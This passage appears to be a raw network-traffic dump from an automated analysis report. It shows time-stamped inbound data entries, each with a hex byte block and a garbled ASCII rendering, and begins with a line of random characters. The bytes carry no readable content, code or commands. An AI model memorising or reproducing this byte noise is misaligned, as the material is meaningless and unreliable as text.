HnqCIB@Fq)+<w1s,F_@cQ]*8GoFQ3R} "WFuD0{..xy'jtkNmy
2023-08-02 08:35:14 UTC	769	IN	Data Raw: 6d cd fe f3 ab 5a ad 11 a6 2a 1e ce 5a 23 33 aa d5 a9 ca 9a 32 d3 15 a2 5b d3 20 27 99 11 da 1b 79 a2 74 12 3d 92 9a e3 39 af e9 e6 49 a8 d0 94 8c 1f 36 52 f1 9c c1 17 da ba 20 55 d6 99 19 77 b4 0c 26 ce 09 37 73 4f 78 56 82 65 51 d8 9b 65 5d 45 e5 d7 db 6a 16 76 b5 99 04 f7 a3 a7 77 8e dd 37 e7 68 f9 db 9c f3 34 64 c0 ca c4 05 71 9e e2 f7 8f 06 f6 e5 ba f5 4e 61 bc 09 5b 46 cd bf 4a 1d a2 72 ee 5f a5 3f b8 5c 9b f8 95 c4 e3 ed 26 4e 56 a8 ed 5c 1e da c8 35 3d cb a3 6d ce fa 8a 69 11 36 55 12 34 11 95 29 cf 18 2f 17 1b f9 95 13 f6 05 19 b5 5d fb 89 91 11 45 24 5e a7 a7 3d ce da f4 ba 04 2d 09 87 08 5d 5c 7d a4 24 1a 31 6f c2 80 3b b9 93 66 04 48 a3 9b 40 63 88 36 04 f8 95 48 14 c5 3f 2e 1f 50 11 be d8 1a d6 34 9a 33 03 1a ae be 41 9d e1 40 32 46 62 7c cd Data Ascii: mZ*Z#32[ 'yt=9I6R Uw&7sOxVeQe]Ejvw7h4dqNa[FJr_?\&NV\5=mi6U4)/]E$^=-]\}$1o;fH@c6H?.P43A@2Fb\|
2023-08-02 08:35:14 UTC	785	IN	Data Raw: 25 76 4f 5a e8 f5 f3 3e 6a c2 01 1c 5c 6a 86 f9 be ee 51 bf 45 18 56 ad b5 88 8c 3b e5 17 53 ef b8 a3 1a be cf 11 6f db a7 88 92 9b 5f 7d ac 76 2f ba 33 bb 7f 09 0c 43 00 e3 66 0b 38 3e e4 ed 19 dc e2 ea b1 da f6 a0 91 e5 05 6d 34 4b 5f 4c 8e df 07 d2 a6 b9 ef 72 eb b4 3f cd 01 77 1b fe 7b c8 5a a4 65 c5 82 3d 3d 59 80 6b 7f 11 92 36 d1 fe 75 b5 40 97 8c fe 1d 01 02 32 19 95 0d 89 b5 4b ba bf 5c 76 bd 42 b0 70 ce c9 9f c2 c1 88 03 8a d9 35 66 ca 3f f2 cf 35 33 1e 50 7f 5d f1 8b fb e7 b7 f8 48 51 28 2b 34 6b b4 ad ff 1b ae d3 70 89 0f 05 0f f6 5c a3 97 18 d4 d6 de 73 8b 87 de be ed b8 9e 97 f8 79 38 e8 0a 95 e5 41 8b 60 fd f3 34 9f 36 d9 c1 81 1a 88 13 8b 56 c1 8b b7 75 50 e9 43 9f 73 49 28 50 04 0a 5f 1d 37 bf 6e fe b8 6e 41 47 73 4d fb 5d 32 38 bf c1 9c Data Ascii: %vOZ>j\jQEV;So_}v/3Cf8>m4K_Lr?w{Ze==Yk6u@2K\vBp5f?53P]HQ(+4kp\sy8A`46VuPCsI(P_7nnAGsM]28
2023-08-02 08:35:14 UTC	801	IN	Data Raw: 20 f8 49 24 84 ea 6b 3c b6 e7 f8 6a 67 62 6d c8 f6 51 55 f3 5a ea 75 85 0d 32 2e c0 80 91 c6 fb 00 56 d2 51 25 ec eb ee 9d 65 46 ba 28 73 91 56 ea a3 a2 11 fe 15 a6 b6 6b 55 0b 5b 5f d8 e4 5f 45 ae 7b 2f a3 be c7 a0 21 2b 90 79 0e 26 d8 e9 76 ae 01 83 89 87 2e 2c 02 f7 fc 93 ae b0 cd 41 e6 90 76 9a 7f b7 ba 3c 6a d1 2d da f8 ee 1b 60 90 a0 af 99 b6 24 68 0d ed 5f d8 42 83 69 71 7b 94 2e 8f ba 32 46 a8 4f 10 f8 d6 3c 22 ca 3c 2c 26 8b 60 7d 5a 99 0b 07 4f 8b c7 db 66 52 82 a9 31 1e 2e b9 ea f9 b3 8c f5 78 33 c4 ef d6 6a 2a c8 3e 59 83 12 48 cc cd 97 c0 66 cb 46 13 3b 25 7d ef ff b6 08 1a ee 7d 1b 58 a3 1e 45 9b 90 1b 7f b1 eb 3a ca ad 01 44 51 b8 51 db 85 65 d7 89 d5 68 65 19 26 92 55 fb 8c 23 8a 0f 34 38 fc 84 d7 00 27 9e dc 90 df 9f 6b 29 ec 0f 96 9c a0 Data Ascii: I$k<jgbmQUZu2.VQ%eF(sVkU[__E{/!+y&v.,Av<j-`$h_Biq{.2FO<"<,&`}ZOfR1.x3j*>YHfF;%}}XE:DQQehe&U#48'k)
2023-08-02 08:35:14 UTC	817	IN	Data Raw: 9b e7 09 25 f4 ec 98 5b 73 de e9 61 63 74 45 52 67 8b d2 aa 7d 3a f5 77 d9 e3 22 d5 39 98 2f fc 4a 50 98 f2 92 cf 55 35 3d 2b 99 ad f1 c2 77 00 33 34 fe eb 1f 53 b4 f3 b5 8f 46 61 3f ff 10 31 66 1f 82 bf 26 8d aa 43 b8 ff b2 fb f2 67 c2 c0 cf 78 be 7f a3 22 bf 6a 2d 39 22 34 67 f1 56 c8 ca cc b0 cc 3b 7a 90 27 6c a3 04 16 75 f3 9c d6 98 f5 a9 81 70 05 d6 2f cc ef ea 9a be 42 1d 9f 0b 7f 1a 9f 92 10 51 79 8e a0 b5 e0 67 47 f1 07 e3 16 ec a6 33 dc be de d4 6b 9e 47 c4 71 f3 95 a7 1f 62 39 ff 54 e3 64 95 3a 88 ce f1 c6 ce 00 cf d4 fa ed 4f 88 0b 85 42 1b 48 6a a7 05 08 c1 a7 26 3c fc e0 30 17 b8 a6 b4 3e ae 5b 85 1e 57 89 7b 8e 51 9f 55 95 1f c5 94 e1 9c 75 0a 27 4d 2b f2 ee 32 58 ef 09 a5 76 00 fa b7 8b 5d 6c 9e 19 db 97 f1 11 23 4c 32 f4 7e 5c a8 9c 95 e7 Data Ascii: %[sactERg}:w"9/JPU5=+w34SFa?1f&Cgx"j-9"4gV;z'lup/BQygG3kGqb9Td:OBHj&<0>[W{QUu'M+2Xv]l#L2~\
2023-08-02 08:35:14 UTC	833	IN	Data Raw: d6 a6 1a 71 15 b1 0e f5 e9 8e bb cb 47 27 49 2b 95 96 fa 10 33 07 69 64 05 7e 5e e0 72 45 bd bb 93 f4 76 ee d2 d9 f0 85 da e0 60 55 99 61 cf 4f 09 36 82 87 2a bb 1d e0 90 0c f9 8e df 91 a8 60 f9 38 9f df 1b 9f 60 7a 4b 4c 7c 60 74 8e 18 1c d4 aa 20 d2 6b b7 ce 20 10 d3 94 5b c7 bc c6 69 c2 e4 41 b0 c6 a8 ae 49 fe e0 87 d4 13 ff 82 c8 dd 06 a0 12 72 03 e3 cf 11 d9 c0 cd 9b d5 d7 cd 7c dc b6 1b c5 c0 4e 11 66 32 20 27 ad 05 be 7f d2 a8 5b 10 7c 8a 0c 4d 98 d1 4b c5 0c 8c 74 53 35 7e 90 14 a9 48 b2 e2 55 dd 60 e6 32 14 d9 9f ad 27 16 fd fe 76 35 50 08 32 1f 45 1f f4 0a 0d 39 54 c8 69 d1 0e 37 ee f2 21 f4 e5 88 5c 7f 7c 70 c5 94 1e 9f 7a 4e 50 91 8f 68 2b f0 89 62 70 f0 1a e4 3d 85 db c2 ff 5c 37 94 b7 8c 17 96 28 11 10 be c5 76 96 c0 81 1a 7a ce 25 9c fb c3 Data Ascii: qG'I+3id~^rEv`UaO6*`8`zKL\|`t k [iAIr\|Nf2 '[\|MKtS5~HU`2'v5P2E9Ti7!\\|pzNPh+bp=\7(vz%
2023-08-02 08:35:14 UTC	849	IN	Data Raw: 4b c9 1f 89 b7 3e 4b 24 a5 0e d6 fd a0 f0 cb 38 10 33 26 98 67 32 bf 69 30 50 30 b7 dd 96 26 24 7f b7 ef b4 cb 27 4b c1 38 88 c6 85 bb 96 99 99 c2 4b 07 10 43 94 c5 fc d7 a2 10 0d f3 29 9e 73 5f ac 83 9c 53 6f ed 55 28 bd 70 2c 57 48 4f 8c b0 b8 c4 3c 6b 44 55 d8 68 e7 da d3 c5 c0 6b 74 9b ed 82 be 83 1e 57 43 69 46 58 6b a2 a8 4c d0 18 56 13 78 c1 cd d2 6b 70 a2 0d 0c fd f2 b6 38 95 8f 48 4c 62 70 07 d9 99 db c7 4e da 41 6d 69 32 c3 e5 da 06 fe f0 a2 3f 1e 1e 46 3d c1 7d d0 9a ee a2 db b5 26 24 f4 1f 16 67 ec e7 48 4b e2 b9 02 49 1f 82 b9 17 c6 31 f7 b7 75 b5 30 7f 21 94 87 05 b3 4c 97 91 58 09 e7 d9 41 ff ae ee 75 f3 a5 c5 52 c1 a5 16 da be a7 9c 10 26 15 fa ce d9 80 ff fb de b0 ca fe 77 d8 af a6 1d 61 76 f3 86 b5 37 c2 a3 b8 13 24 34 44 61 cc fc ed a0 Data Ascii: K>K$83&g2i0P0&$'K8KC)s_SoU(p,WHO<kDUhktWCiFXkLVxkp8HLbpNAmi2?F=}&$gHKI1u0!LXAuR&wav7$4Da
2023-08-02 08:35:14 UTC	865	IN	Data Raw: e2 81 11 8d 97 25 5d c1 f6 fa 06 0e 27 53 9e 1f d6 5d f5 82 7f d9 d8 5f 4f 5a d7 4d fc 0c 39 e4 af fa 54 52 0f 44 85 1b 0f c0 05 38 6d 70 58 46 c4 1e ee 3a e9 23 60 c3 4e 23 e9 91 4f 9d 9d d1 69 c4 de ef 12 73 57 92 af 85 2a 16 58 34 37 de 1b 8e 57 0a ae e2 84 f3 23 d4 09 18 87 06 41 aa f1 e6 a1 01 72 c6 11 7e 7a 73 a6 93 3d a8 7a 0d 33 61 f3 8e a8 52 f1 bc a2 5b 73 3a 8e ee 62 bc e6 c1 33 a5 b1 ea de 42 0f 78 80 ea e3 05 ee 57 e0 6e 6d 00 f7 c7 a5 f2 ae 74 50 f7 d8 30 24 17 ed d8 2f 5c d6 bf 4f f4 9a e6 be 33 63 5c 6b c0 2e 1f 74 43 10 48 94 33 8d a7 19 63 ce 7f c0 7e a1 5a 5a 90 fc 2c 85 38 90 c9 f2 af 2d a3 71 d5 87 9d aa 1d 74 2a 6a 80 27 e6 f8 e9 c3 90 31 b1 ee d5 9a 01 04 70 22 7e 04 d1 20 d9 a8 2d d6 41 8d de e8 d8 6a dc 03 9e 9f f8 eb 15 b6 43 2a Data Ascii: %]'S]_OZM9TRD8mpXF:#`N#OisWX47W#Ar~zs=z3aR[s:b3BxWnmtP0$/\O3c\k.tCH3c~ZZ,8-qtj'1p"~ -AjC*
2023-08-02 08:35:14 UTC	881	IN	Data Raw: 55 df 92 82 2f 9d 1f 6e 61 04 99 26 2d 38 da a4 42 3f bf 80 db 22 81 01 75 a8 67 06 4f 8a 97 db 3d bd 70 6f bc ec 61 14 17 54 2a 9b 51 d9 96 4b 33 a0 16 17 f8 c9 d0 fd a3 20 47 25 88 6e 5e 00 a7 a9 de 40 67 c5 a8 9d 39 ba 10 ce 54 f3 2e d7 95 a3 a0 fb fa 03 39 df 13 3c f5 45 f3 16 1b 75 f3 9c 87 14 6d eb 24 fd f5 41 dd 3c 48 ab 18 95 5e ad 32 57 80 3c 88 72 a6 7e 0a da 99 2e 2e 27 cd f4 38 c3 b1 c9 b3 4f f7 fb 08 28 d5 4a b1 02 91 b8 2c bb 65 ab 58 56 f0 d5 b0 6a de 4d a1 f9 cc 01 12 14 7a 56 2e 14 de 22 37 be 40 b1 c6 11 e4 86 d0 a1 b6 9f 24 31 11 eb 3a c5 6d b1 58 8c 6b 90 ff 20 8d 50 c4 a8 c0 4a e6 36 ce ca 1b 4e dd f9 1b c5 ab 6d c7 5d fb fd 4e ff 50 dd 16 af 05 73 1d f5 9f 78 24 7c dd 47 6a 36 aa 6e 7d 6c 74 2b 72 d3 10 15 a1 13 26 40 ff 91 5a 8c c2 Data Ascii: U/na&-8B?"ugO=poaT*QK3 G%n^@g9T.9<Eum$A<H^2W<r~..'8O(J,eXVjMzV."7@$1:mXk PJ6Nm]NPsx$\|Gj6n}lt+r&@Z
2023-08-02 08:35:14 UTC	897	IN	Data Raw: e9 9c 62 09 82 68 eb 6b db 7b 67 ea 38 3b f2 8c 2c 0b e7 a6 7f 12 09 94 36 d7 9a ef 16 a7 ce c3 4d fc b2 98 83 df 8f f2 dc 46 5d ac a5 48 80 04 71 96 91 6f 50 80 d6 11 e5 2f 68 a2 0a 5d 96 90 6e 1a 5b 4f 12 6e 06 7b d5 c0 65 be 8a 63 b2 5a 82 48 43 05 3f 2a 7a fb 0e b9 3d a1 03 80 fe 01 e1 f8 0b d7 39 2f 6d 89 2b 74 87 0d e1 be 73 73 27 86 2c fa 6d b6 fe a9 5f 87 17 74 13 fc a3 0a b0 e8 d0 6f d6 cc 91 29 b5 91 2a a5 f4 5e d1 58 fa 18 8b a4 2b 91 5d b6 ef 6d 73 e1 86 42 b8 d8 03 18 a8 0a f8 cc dc ed 4e 3d cb 4c 3e 24 17 ca 60 a0 23 8c 5f d1 95 84 0f 09 e0 32 ec d2 9c c9 fd 64 2a e9 f4 a9 c4 8e 3c b3 98 80 2e 39 c3 94 1a c3 d7 d3 eb 8d 26 27 f6 74 a6 fd ae 8c c1 cf 38 d9 9c 63 7e 26 57 80 90 b6 30 b2 06 b0 d4 b9 41 84 55 16 d3 92 e1 1f e8 19 a6 64 3d 35 4b Data Ascii: bhk{g8;,6MF]HqoP/h]n[On{ecZHC?z=9/m+tss',m_to)^X+]msBN=L>$`#_2d*<.9&'t8c~&W0AUd=5K
2023-08-02 08:35:14 UTC	913	IN	Data Raw: fa 66 60 37 8d 13 88 f0 2e 77 48 32 62 94 ba 85 89 86 2f 51 a2 48 53 76 11 8a 97 89 a4 aa 9d 98 ec a7 4e 84 cc 8f 55 28 ed 71 d1 77 ba 9c 58 74 34 68 ac 4d 53 15 bd 0e 06 91 ff 74 09 78 da ff ea 3d 23 76 94 59 15 8b eb 0d 31 eb 1f f9 64 04 96 eb 98 1a 7f fa 28 36 30 e5 b3 6a fd b3 9e 25 e7 89 cc 04 06 b4 07 dd 5d 4c da a3 aa ca bc fd c2 f8 b4 a6 a1 65 38 47 f9 ca 62 98 90 0a 62 6d 71 14 3f a7 2d 2f 57 5f 1a 68 4d 64 89 1e a7 de 72 e8 7e fd f3 4b 03 10 ae 51 e4 2c 03 3b 97 97 31 f8 16 01 d7 cb 9d 39 fe 97 f5 eb 74 4d 01 74 60 c8 4d 3e 6b 34 a2 df 63 ed a5 51 8e 48 0c ed 99 4d 04 df 50 43 62 c1 9d a3 70 2d 44 cc f0 1b 65 02 d0 11 7f 77 b7 bb bd 53 86 27 6b 22 e7 62 1e 15 93 90 2e 1a 23 09 39 79 c0 19 7b 2a 72 6b 9d e7 61 b5 fb 3a 2d 2c 46 53 1f 09 21 70 24 Data Ascii: f`7.wH2b/QHSvNU(qwXt4hMStx=#vY1d(60j%]Le8Gbbmq?-/W_hMdr~KQ,;19tMt`M>k4cQHMPCbp-DewS'k"b.#9y{*rka:-,FS!p$
2023-08-02 08:35:14 UTC	929	IN	Data Raw: 42 a9 7f 37 9d 51 ce 90 d6 04 ac 5b e5 52 13 95 ef d8 5f fd 37 42 77 75 56 07 0d 51 29 32 80 be 6b e4 db b6 70 99 cb c2 5d b6 f4 6a e0 62 0f 42 7e 8e 08 88 92 bb 89 d6 da ef d7 cb 23 c4 bd f1 6b c3 a9 0c 2a 71 f8 22 94 a7 58 a0 e3 cc 0a 68 db d7 4c 53 62 43 46 82 d3 81 9d 5a 03 a9 ad 8d a8 72 d9 a9 7f d5 9e 36 a0 12 20 9f 51 75 6f 7d 30 c1 58 7d e8 10 df 4f 8d 59 49 33 31 56 e0 ed 65 e0 df be e0 f5 73 19 63 99 84 05 4b 3c 57 d6 eb e3 26 f9 62 db b0 9a 1f 09 e9 5e 8f ee 83 45 38 34 48 a6 a0 9e 48 cb d6 5a aa 2a ad d0 6f 79 ed 86 e0 43 fa 2c da e5 8e f4 62 90 43 a3 00 be eb cf 6d 8d 59 dd 09 7b 8e 7b 5b 04 9f fc 47 ae af 7c e3 70 06 f2 0d 8e 37 2f b9 73 41 b9 0a 25 f3 2c 07 32 77 18 d0 8a d7 2f 54 6a e0 77 f6 dd 0d 3a ed f5 66 4e 06 2c 5b bf 03 c7 29 77 ed Data Ascii: B7Q[R_7BwuVQ)2kp]jbB~#kq"XhLSbCFZr6 Quo}0X}OYI31VescK<W&b^E84HHZoyC,bCmY{{[G\|p7/sA%,2w/Tjw:fN,[)w
2023-08-02 08:35:14 UTC	945	IN	Data Raw: d6 6d af 7f f0 47 f7 9f 96 89 51 3d ae c9 a1 b3 eb d9 a4 5c 6c 33 12 ce 5b 79 39 60 c8 46 fc 0e 20 5c ef 73 c8 15 b1 9f 39 cc cb 68 a9 90 4e 04 98 d7 c4 e1 d9 bc 04 1d a8 ca 6a fa 47 7e 2d c8 6f da 03 28 7c 54 8d db f3 8a 70 a9 a9 e2 da 59 01 bd e6 8b 79 d3 47 62 80 f6 60 66 20 45 4d 64 5e 99 01 0d 2a 21 09 67 e1 5f c6 4e 7a 41 9e 15 59 6a 84 f4 b8 37 e9 68 9a 19 bb 16 4b f6 35 b3 91 ec f0 db cd 62 3c 92 2b 39 03 19 1f e6 4b a6 bc 98 9f 51 12 67 0d 5f 98 15 27 3d 5b 92 98 77 1f a7 01 12 1d e2 76 2a 6c 63 95 ab fa 37 d4 f3 74 81 79 18 ef d7 c1 8f ef b7 65 c2 4e 29 05 0a 03 2a 67 0c 43 d4 4d df ec 8d 57 6e b5 2d 16 08 e5 ca 8f 55 e4 e9 5c 19 74 41 be f5 be b6 85 65 34 a5 84 f8 4b 52 ed b7 a8 d0 bf 1c be 10 b3 c3 ec 89 dc 19 9d dc 6f bc 6a 65 99 90 8b 3e 95 Data Ascii: mGQ=\l3[y9`F \s9hNjG~-o(\|TpYyGb`f EMd^!g_NzAYj7hK5b<+9KQg_'=[wvlc7tyeN)*gCMWn-U\tAe4KRoje>
2023-08-02 08:35:14 UTC	961	IN	Data Raw: 2a d8 08 6c d5 df 20 b8 8a 7c a6 cf 9b 51 4e 8a 12 ac 08 cd 98 ce 87 73 e1 ed 15 e7 4b 28 99 7e 3e ce 92 b1 f7 12 1a a7 f8 c3 97 f2 53 88 ff bc 0b 05 e1 65 b3 04 67 7f ec c1 95 53 ea 2a 14 31 1d 55 05 49 a7 1e ec 0b 7f 01 4f 37 33 c0 69 f4 cc 69 2e b6 ff 3e cc 95 26 f3 5d 29 0a e0 1d 70 c6 f1 27 07 f3 f8 af 9b 7b 72 a6 63 70 34 ac b6 ca c6 97 ad e3 49 b4 9e ae c5 97 bc 7b 3e a2 f8 c9 63 ea 9b b6 51 27 64 a2 98 cf d8 97 6a c9 a1 ce d0 33 79 60 17 5d 14 4f c1 de b2 1c 5b 3f 56 60 2c 45 b9 f0 19 3a 5d fa cb c6 22 5f 94 88 50 a2 2e e0 19 91 f0 53 aa 9b 3b 1b 7e ba 29 25 82 3a a1 c7 4c 1e e8 2f 09 f0 71 0f 8f cc bd 70 f6 b9 af 44 f6 b6 8d 4e 69 f2 b8 20 fc b0 4d c9 bc c5 2c 48 67 84 54 de 77 03 65 8d 34 dd 5d 52 c1 e2 5b 0e bf 97 5a c9 93 a0 b1 d6 f7 55 10 a7 Data Ascii: l \|QNsK(~>SegS1UIO73ii.>&])p'{rcp4I{>cQ'dj3y`]O[?V`,E:]"_P.S;~)%:L/qpDNi M,HgTwe4]R[ZU
2023-08-02 08:35:14 UTC	977	IN	Data Raw: 0b b1 33 3a aa 89 e4 52 3e 33 eb c6 40 b5 f8 31 2d b6 e7 4b 7c 2e cf da 60 55 6f 8a 43 cb da 34 f8 9c 21 f0 8c 51 ab 6f f2 a8 65 45 eb 8e 2b 84 bc 8c 22 85 67 0d 1a 60 87 ad b2 f7 ac 95 ac fd 48 76 e2 8c 25 e0 36 b6 41 de 5c e2 24 12 7c 3d 7b 50 e6 dd c6 b6 2e d0 c9 c4 ff b2 68 f1 e9 1b e3 74 7c 91 1d d4 69 15 e3 20 fc a0 c4 1d 6a da 78 73 f1 56 a5 f8 9f 7d c8 dc 51 5e 45 d0 c5 dc da 9d 68 5a f7 5b bf e1 e6 d5 d5 62 65 a6 7f 5b 85 24 a9 9e 2b 83 84 95 82 20 41 a8 16 d1 2c a9 83 89 1c c1 6a 48 21 1e 10 60 d1 be f6 75 b9 55 66 26 a1 83 d1 72 b9 6d fd 84 2b 97 86 6d a8 a6 f7 58 51 5a d1 c5 e5 34 39 5f ae 8e 0e 3a a6 c6 99 21 39 ea 1e 6c 19 6f 68 22 8f ba ea 4c 5b 0c d0 7c 15 fc 00 8a 1d ac d7 2c dd 90 7f 3c d9 dc d8 e9 8f 6a 07 d6 d8 cf b8 d3 6c f7 65 6f f4 Data Ascii: 3:R>3@1-K\|.`UoC4!QoeE+"g`Hv%6A\$\|={P.ht\|i jxsV}Q^EhZ[be[$+ A,jH!`uUf&rm+mXQZ49_:!9loh"L[\|,<jleo
2023-08-02 08:35:14 UTC	993	IN	Data Raw: bd a1 b1 61 72 4e f1 8a ac 54 34 d9 be 7a 84 b6 1b ed 49 5a 01 ce a1 f7 8e 06 c4 3d 01 fb 0f cf 22 c2 16 0c 8e 14 7e d2 fc 90 5b 38 eb 14 4f 83 96 ab 16 6b 58 a1 f8 e6 6d 19 45 31 1f 4a 93 4d fa 64 ef 4e 30 f5 af 19 22 24 73 6b 46 69 53 b0 5c cb 20 ba fe e1 37 1c ed db b0 c5 b7 64 38 eb 78 2a ec 05 73 fb b8 79 1e 8a 4f 56 b2 7e 7b eb 59 81 a3 ec 7b 8d a4 69 66 dc 9a ac 33 9d d0 2b ac 6f f1 94 e7 00 42 63 f0 92 1b f4 bb 57 a2 ea b8 62 9f d3 2e 50 b1 00 48 93 4a ec 50 b2 dc 76 22 0f 08 c8 a3 f7 25 5d 03 60 2c f1 de b7 36 3d 66 90 5c b3 03 bd 4a 31 35 b5 b3 6c 5b 92 41 8c 07 0d 84 2b 38 96 aa 73 da a8 94 8b 01 a5 d0 eb 44 07 b1 8f a2 87 d1 f8 bd a0 c2 fe cf 79 c7 af 12 24 67 42 bd 55 9f d4 ab 31 d8 76 52 70 3d ff 97 a8 a5 40 c1 00 74 56 19 5a 66 8a 98 14 a7 Data Ascii: arNT4zIZ="~[8OkXmE1JMdN0"$skFiS\ 7d8x*syOV~{Y{if3+oBcWb.PHJPv"%]`,6=f\J15l[A+8sDy$gBU1vRp=@tVZf
2023-08-02 08:35:14 UTC	1009	IN	Data Raw: 1b 52 c9 cf 45 b8 9d ce 30 14 22 53 44 3e 44 1a 1e 71 9f f5 56 4a 92 25 30 e6 88 c3 a8 33 6f 1a 61 a5 3c 5c 3a bc 82 24 0c 1f 3f d1 79 91 12 1b c5 dc dc 36 8b 4f 37 9b ca 5d b1 1e cb f8 d5 36 20 ba 96 3b ca 40 5c 52 03 a6 54 e1 0e 86 fb 8d 43 c9 2e a9 4a 61 11 48 7d 0f 09 b7 6f 26 9a f0 59 b1 12 2a 93 d9 15 49 cb fa 8d e6 55 bb 9e 05 ba a2 6b c7 1d 1d d8 24 a3 31 34 5a 4f a9 bd 17 6e da db 16 17 3b 57 0d f6 e4 a5 73 50 9e c2 b4 13 6c 86 6f c6 88 ac 2e 0b 8b 92 87 a4 8e bf ef 3d 64 29 37 cb f6 74 6d 3b 1a 26 a2 de e3 21 00 77 1b e5 76 d2 81 07 10 90 2e 89 14 1b 37 c0 f9 23 38 85 79 1f b3 f3 50 18 67 2f c2 34 5e 93 bb c3 4d 1b d2 d3 91 ae 3a 69 46 02 e6 54 d3 d7 7d fb 62 76 7d 0d e5 3e f8 de aa 03 93 ab 23 66 f6 3e 30 dd 9e ab 5e 74 26 ce cf 96 4a 0d f0 62 Data Ascii: RE0"SD>DqVJ%03oa<\:$?y6O7]6 ;@\RTC.JaH}o&Y*IUk$14ZOn;WsPlo.=d)7tm;&!wv.7#8yPg/4^M:iFT}bv}>#f>0^t&Jb
2023-08-02 08:35:14 UTC	1025	IN	Data Raw: ce d6 d0 a6 40 65 44 26 c4 fc f4 8d 3e 56 dc 25 48 eb 66 9d e6 74 32 56 33 0d 2d 38 01 f0 ee ae 55 ad 8b 59 d4 66 9c 91 55 6a a3 d4 79 0f c7 4f c0 40 30 f8 3b 94 61 e8 93 b7 bb d0 d1 7b 48 bd 3f 59 8f e5 a4 31 c4 08 75 27 9f b3 22 fd 9d c8 45 9c 23 40 11 a9 f2 e7 06 74 76 cf b6 0b f9 ea 6e 3b cc 1f 64 58 47 91 d6 8b 37 ff 19 cd 2e 01 90 ee ae f5 f7 b1 38 6a 58 e7 a5 74 02 54 85 3e 2f c5 61 73 06 5c bf e7 31 de 0b 85 5b 26 bf da 0a 6e 03 ce 78 24 5b 6c aa f6 a6 35 3f a3 f2 23 fa 71 34 7e bb 2e d0 5c 1b aa c6 e9 05 4a c8 dd d0 97 03 2d db fb aa 53 d3 80 84 cd 6b 99 b1 5f 0d d2 ee 8e 95 1c 4f c7 8e 57 83 01 9c 15 f8 88 99 f8 88 39 29 dd d0 66 c8 bb 7b 1d 35 e8 11 42 07 5d 2f 01 8d 18 11 8a 47 3f 40 ba d0 1c b5 f8 01 59 9a 19 06 1d 6b 05 2a 22 80 92 50 1d 24 Data Ascii: @eD&>V%Hft2V3-8UYfUjyO@0;a{H?Y1u'"E#@tvn;dXG7.8jXtT>/as\1[&nx$[l5?#q4~.\J-Sk_OW9)f{5B]/G?@Yk*"P$
2023-08-02 08:35:14 UTC	1041	IN	Data Raw: f3 95 c5 c5 19 66 91 a1 48 81 f9 3b fe 15 c3 0f c6 e3 2b ae a7 3b 14 92 bb 2b f6 05 73 76 c1 aa 1f fd 72 c9 ff ac db 33 8e 82 8d 1f 3d 81 46 f6 53 1d 98 1b 6a ff d9 89 12 a6 dd 8f 9b d1 2f 0a 89 cc c6 32 b9 02 11 4c fb 80 c6 d6 7b 48 5a ce 8d 2a 40 08 06 53 68 14 72 a0 88 07 00 c1 f8 65 16 76 b7 10 39 5b 2a 79 b1 f0 a9 05 b6 b0 b3 ae e9 5a d2 de 81 ca 97 ba ce c1 60 a8 48 7f 0e eb 16 72 7f d3 89 0e 5c cb 06 c8 88 3a cf fd 17 2d e5 d5 a3 3f e3 8c c1 12 80 49 15 65 79 8b d5 a5 b6 0d 34 b0 d4 06 16 02 fd 06 be 62 e2 f3 a9 c7 05 e8 69 9c fc 15 d1 65 ef 7d 98 71 f9 f1 35 b9 32 48 22 88 82 71 80 d3 8a 31 2a b1 5d 58 82 96 87 8b 8c 8c 24 b5 ea 0e 10 4c 2c 2f 15 51 bf 86 8e d8 98 bd e4 0a 0a cc 07 70 3c 79 c0 fd be ba 8d f2 dc fa 30 5c 70 c7 7d a2 4b 03 d3 73 b7 Data Ascii: fH;+;+svr3=FSj/2L{HZ@Shrev9[yZ`Hr\:-?Iey4bie}q52H"q1*]X$L,/Qp<y0\p}Ks
2023-08-02 08:35:14 UTC	1057	IN	Data Raw: fa d9 6e 87 28 2f 8d a1 4d d1 b9 52 e9 c7 1a 63 6f a7 55 7a 71 61 2d 04 4d ec 0e d5 09 b7 a5 52 86 2f 0c ac bd 34 03 27 85 5d 6b 10 41 ed a8 7e 70 80 31 99 a2 1d 41 85 f0 f4 df ef 82 66 8d 94 3f 25 e0 65 de 0d 32 ee 66 51 cf 48 79 5e e5 e4 ae 86 66 a4 8e b5 1b 00 10 6e de b8 74 0b 2b 7d 1a 69 3a 49 20 4b 77 02 2f ba 92 3c 40 6a 27 dd 11 b7 e0 f6 89 9f b5 0b 58 4b 2f ab 22 27 ac a7 74 70 2d 21 da 47 5c 2b 64 d4 68 80 6f da 05 b7 bf 4d 8b dc 97 c7 f9 38 bf 14 0c 1f 85 30 69 10 0a dd 65 0c 9f 22 ac d7 ac a3 55 33 c0 ed d5 04 ed be 03 64 99 45 1c ea 07 27 60 fc 8b 43 8b 1a ac 86 07 3d d8 b1 e7 6e 2d db 9e 18 49 45 43 d4 5e 0c 06 5f 52 d3 cb 22 fb fe 0b 16 c0 53 18 b2 da 01 fa 3e 25 62 96 70 aa b8 6d 95 c5 38 57 1b 20 88 0f 79 e6 8e aa 77 75 6b 66 44 c3 ab dc Data Ascii: n(/MRcoUzqa-MR/4']kA~p1Af?%e2fQHy^fnt+}i:I Kw/<@j'XK/"'tp-!G\+dhoM80ie"U3dE'`C=n-IEC^_R"S>%bpm8W ywukfD
2023-08-02 08:35:14 UTC	1073	IN	Data Raw: e7 48 59 c8 3c f9 a7 d9 e4 08 84 9c 3e 63 57 64 90 a5 71 11 2e c0 32 e8 8a 49 da 58 8e f3 1e 56 d7 f7 c6 88 de ab 1a 81 f0 fa 23 95 cf d9 85 8b 87 6d 4d 2c 2f 67 a6 46 b6 cf 7a 5f f6 21 3a 0b 0b f4 16 66 60 c2 e3 e5 5a cf df 54 fb 45 22 ac 82 a3 47 7a 74 fd e1 f8 a7 1a 00 56 5d 19 bc fe e1 f3 84 cf fc 0a 75 c1 f3 d1 ad 04 90 e1 2d 76 0f 74 4c 4f 13 81 b6 bf 57 79 26 36 d9 d3 c0 48 2d 7f 57 73 ce 90 23 81 9f 73 6c 52 a6 da f4 fd 6d 81 36 e7 34 6e 14 b9 1f b3 2a 7b 82 da 31 ff 17 0a 5e b7 17 dd f9 71 83 79 24 54 6c cd 00 a1 44 89 cd f5 1c 1d 94 fb 6b 06 b9 c1 9b b8 e7 0e 5b 14 40 d9 2f 3f 78 1b 54 77 1f 65 dd 2e 2a 4c d6 6d 3b 5e 05 88 fa 94 b5 1f c6 b8 91 da 9b 40 7f b2 72 44 ee 56 1a d8 23 a1 92 8f d6 e9 69 cc ca ea 1a 94 16 89 fa 1f 3d a9 cb bb 6d 1a 5c Data Ascii: 